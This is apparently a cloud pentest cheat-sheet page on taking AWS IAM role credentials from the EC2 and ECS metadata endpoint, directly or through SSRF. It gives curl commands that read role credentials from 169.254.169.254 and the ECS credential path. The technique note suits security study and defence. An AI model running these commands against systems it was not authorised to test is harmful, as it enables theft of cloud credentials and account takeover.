Every EC2 instance and ECS task with a role reaches its credentials through the link-local metadata endpoint at 169.254.169.254. Anything that can make an HTTP request from the instance, a shell, a vulnerable web app, or an SSRF, can ask the metadata service for the role's temporary credentials and walk away as that role.
What folds in here#
- IMDSv1: the unauthenticated GET endpoint, the easiest case.
- IMDSv2: the token-first flow and what it takes to satisfy it.
- SSRF: reaching the endpoint through a server-side request forgery in an application.
The endpoint#
# role name, then its credentials (IMDSv1 form)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>
# ECS task role uses a different path
curl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI